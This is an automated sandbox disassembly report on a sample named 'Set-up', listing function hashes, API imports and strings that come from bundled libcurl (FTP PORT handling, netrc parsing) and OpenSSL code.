Opcode Fuzzy Hash: 470507f0a366c9551d8fb1f43d93df267f055bfc09dc2daf15c294aef085ad29
Instruction Fuzzy Hash: 3D138C70609342CFD728CF6CC08062ABBE1BFC9B54F154A2DEA959B351D775E846CB82

Function 00E0E520 Relevance: 88.3, APIs: 25, Strings: 25, Instructions: 766COMMON

Download Yara Rule

Strings

getsockname() failed: %s, xrefs: 00E0E905, 00E0EC1B
bind(port=%hu) failed: %s, xrefs: 00E0ED00
Failure sending PORT command: %s, xrefs: 00E0EF05
failed to resolve the address provided to PORT: %s, xrefs: 00E0E9DD
,%d,%d, xrefs: 00E0EEBF
STOP, xrefs: 00E0C3C6, 00E0EA55
[%s] ftp_state_use_port(), listening on %d, xrefs: 00E0ED9D
[%s] -> [%s], xrefs: 00E0C2D2, 00E0C3D2, 00E0E4FF, 00E0E56E, 00E0E662, 00E0EA61
[%s] ftp_state_use_port(), socket bound to port %d, xrefs: 00E0ED32
[%s] ftp_state_use_port(), opened socket, xrefs: 00E0EAE2
PRET RETR %s, xrefs: 00E0E5D9
%s |%d|%s|%hu|, xrefs: 00E0EF47
socket failure: %s, xrefs: 00E0E9D5
EPRT, xrefs: 00E0EF42
PRET, xrefs: 00E0E656
Failure sending EPRT command: %s, xrefs: 00E0EF6C
???, xrefs: 00E0EADC, 00E0EAE1, 00E0ED2B, 00E0ED31, 00E0ED96, 00E0ED9C
PRET %s, xrefs: 00E0E5FF
PORT, xrefs: 00E0EED7
%s %s, xrefs: 00E0EEDC
PRET STOR %s, xrefs: 00E0E607
NLST, xrefs: 00E0E5F6, 00E0E5FE
LIST, xrefs: 00E0E5F1
bind(port=%hu) on non-local address failed: %s, xrefs: 00E0EBC6
bind() failed, we ran out of ports, xrefs: 00E0EB15

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$???$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$LIST$NLST$PORT$PRET$PRET %s$PRET RETR %s$PRET STOR %s$STOP$[%s] -> [%s]$[%s] ftp_state_use_port(), listening on %d$[%s] ftp_state_use_port(), opened socket$[%s] ftp_state_use_port(), socket bound to port %d$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
API String ID: 0-1569884781
Opcode ID: 14d3165b904a5e95b1c40fa54cc4264c54d8a369666724a3db201e765a86d5aa
Instruction ID: bed865b7f529e0e566282e7ffc9a0b2d1b505af5c7acbcce8984936673ac20a4
Opcode Fuzzy Hash: 14d3165b904a5e95b1c40fa54cc4264c54d8a369666724a3db201e765a86d5aa
Instruction Fuzzy Hash: 0442F2716083019BD728DA24DC85BAB77E9EB94308F085C3DF985A73D2E731DD8587A2

Function 00DCE620 Relevance: 62.3, APIs: 29, Strings: 6, Instructions: 1028COMMON

Download Yara Rule

APIs

fputc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00DCE6F1

Strings

(nil), xrefs: 00DCECCD
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00DCE68E, 00DCE9AF, 00DCEAF0
.%d, xrefs: 00DCEE0E
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00DCE9AA, 00DCEAEB
0, xrefs: 00DCEBCA
-, xrefs: 00DCEC74

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: fputc
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2555271450
Opcode ID: 60937b963016e6bf7743c298826682910223fd669b3c7ab2c1e96301631cfb1c
Instruction ID: 904143320966ddbc780785d694265bd287640c75eb582a1ea9b9e334bc4e9093
Opcode Fuzzy Hash: 60937b963016e6bf7743c298826682910223fd669b3c7ab2c1e96301631cfb1c
Instruction Fuzzy Hash: 02828271A083429FD714CF19C880B6BB7E2EFD5724F188A2DF99997291D730DC458B62

Function 01050170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 01050374
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 01050395
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 0105049D
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 010504E7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 0105055F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 0105057A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 01050618
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 010506E3

Strings

SHA1, xrefs: 010501F7
MD5, xrefs: 01050194
SHA2-384, xrefs: 01050B62
SHA2-512, xrefs: 01050BA5
SHA2-224, xrefs: 01050238
SHA2-256, xrefs: 01050B05
@, xrefs: 01050B42

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
API String ID: 1297977491-3776850024
Opcode ID: 04fa039fdb71147eb20f5f2ef6a3c5a24a0332842fd3cab62316a55d58b39533
Instruction ID: 1d18cbd39ff6c5fdc85f691ab25e7586484cbf282aa684da4fc4b2a33425f794
Opcode Fuzzy Hash: 04fa039fdb71147eb20f5f2ef6a3c5a24a0332842fd3cab62316a55d58b39533
Instruction Fuzzy Hash: 175290719087828BD751DF28C841BAFBBE4BFD9344F088A2DF9C897256E7749504CB92

Function 00F9E270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00F9E28D
FindNextFileW.KERNEL32(?,00000000), ref: 00F9E2BB
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 00F9E30A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00F9E3C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00F9E3DD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 00F9E3F8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 00F9E41A
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00F9E44E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00F9E563
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00F9E571

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
String ID:
API String ID: 1393009926-0
Opcode ID: 76d7031558b638f9657173ee60aff9a0144798221ae496d7f69dfc2df3a2d1d1
Instruction ID: 4eac1c4594e426583c2fdd90791664ec2cf6eace245a79df5dedc63021decc29
Opcode Fuzzy Hash: 76d7031558b638f9657173ee60aff9a0144798221ae496d7f69dfc2df3a2d1d1
Instruction Fuzzy Hash: 5B912631A10B029FEB25CF78CC84B66BBA5FF85325F184668E9558B2E1E730E950DB50

Function 01130460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 011306A3

Strings

, xrefs: 011316D8
, xrefs: 01131813

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: $
API String ID: 3510742995-227171996
Opcode ID: e86ae7a08331bdf8f9bc294e026ff9b7bd90ed889ed7b8bdc89875fedd51169e
Instruction ID: 40e07413c481a5872fbbda7d1bb46ef955665517e0bf919940e976771ef8aa39
Opcode Fuzzy Hash: e86ae7a08331bdf8f9bc294e026ff9b7bd90ed889ed7b8bdc89875fedd51169e
Instruction Fuzzy Hash: 99D2B371A087158FC728CF28C89026AFBE1FFC9314F198A2DE99997355D770E945CB82

Function 010087D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 01008A66
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 01008A88
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 01008B45
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 01008B59

Strings

providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 01008A42, 01008F13

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
API String ID: 1297977491-3184136495
Opcode ID: a8d40dc14b5f7f8f8d990ff055d49ca20d2bbac6ef99df2724ef3a44313e05ad
Instruction ID: 3273c433128a9acf9b672332d4332e719faaaebf9ddcf6b74f9fbc0903a8ed9e
Opcode Fuzzy Hash: a8d40dc14b5f7f8f8d990ff055d49ca20d2bbac6ef99df2724ef3a44313e05ad
Instruction Fuzzy Hash: B622D271908B419FE712DF38C840BABBBE5BF96344F088A1EF9D597282D734E5448B52

Function 01144780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 011447A3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 011447C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 01144800
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 01144D16

Strings

H, xrefs: 01144A88
xn--, xrefs: 011449D3

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _strdupmemcpystrchrstrlen
String ID: H$xn--
API String ID: 1602650251-4022323365
Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction ID: edc1f2aab58be6aa8f4b3cf8e61846625afbbf1c9f2577d7b16d6ea158a531e6
Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction Fuzzy Hash: 07E14671A087158BD71CDE2CD8D072EB7E2AFC8A24F198A3DE9D687781E7749C058742

Function 010CC050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 010CC090
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 010CC0BE

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 010CC0D2, 010CC266
assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 010CC433
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 010CC0CD, 010CC26B
crypto/evp/encode.c, xrefs: 010CC42E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
API String ID: 3510742995-2458911571
Opcode ID: 958a017666ce81d57609944d800dca13d5fd8b4046f68c2aa73bae3fba0cf3f4
Instruction ID: d7b7305433274fbedcd0e5b1dfe22cdce31d9d606563602602ff79384cdc9f58
Opcode Fuzzy Hash: 958a017666ce81d57609944d800dca13d5fd8b4046f68c2aa73bae3fba0cf3f4
Instruction Fuzzy Hash: A6C1067160D3928FD715DF28C49062EBFE1AF96604F0989ADF8D98B382D335E905CB52

Function 00F22430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON

Download Yara Rule

Strings

@, xrefs: 00F24DB4
@, xrefs: 00F24EA7
@, xrefs: 00F24F5D
ssl/quic/quic_txp.c, xrefs: 00F22A29, 00F23096, 00F23477, 00F2357D, 00F23FDE, 00F24101

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: @$@$@$ssl/quic/quic_txp.c
API String ID: 0-600063881
Opcode ID: 2fcd0d4a97675ee8c487aa69c7f1a1fbcf613c76c34358373043b47d44e7f500
Instruction ID: 7165726e031917ae67210dfd6b214c4ef0566689fa74da80985da6653c45fb2d
Opcode Fuzzy Hash: 2fcd0d4a97675ee8c487aa69c7f1a1fbcf613c76c34358373043b47d44e7f500
Instruction Fuzzy Hash: 2053F571A083519FD724CF28E881BABB7E1FF84314F18492DE89987391E775E944DB82

Function 00E26210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

login, xrefs: 00E264FF
machine, xrefs: 00E26456, 00E26656
default, xrefs: 00E26471
password, xrefs: 00E265C6
macdef, xrefs: 00E2643B
netrc.c, xrefs: 00E26243, 00E26541, 00E2655C, 00E26609, 00E26627, 00E266DD, 00E266F7, 00E2670E, 00E2673F, 00E2676B

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: 8cd6abbf6b5411d1ffdd8c80e462a1eec806de2b4e879fb02a73572ecdfb7709
Instruction ID: d77e2b0a8bd3ab3bf72258e4e905b3b5e12cc61ae34d4a603edaa953ee686369
Opcode Fuzzy Hash: 8cd6abbf6b5411d1ffdd8c80e462a1eec806de2b4e879fb02a73572ecdfb7709
Instruction Fuzzy Hash: 7BE1157050C3A1ABE710DF14A885B6B7BD4AF8570CF14292CF9C567282E3B5DD48CBA2

Function 00F300F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00FB2212,00000000,00000000), ref: 00F30109

Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77262
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77285
Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772C5
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772E8

Strings

a2d_ASN1_OBJECT, xrefs: 00F30128, 00F3014A, 00F305BD
crypto/asn1/a_object.c, xrefs: 00F3012F, 00F30151, 00F3039E, 00F303B4, 00F305C3, 00F305FC, 00F3062C
1, xrefs: 00F30328

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

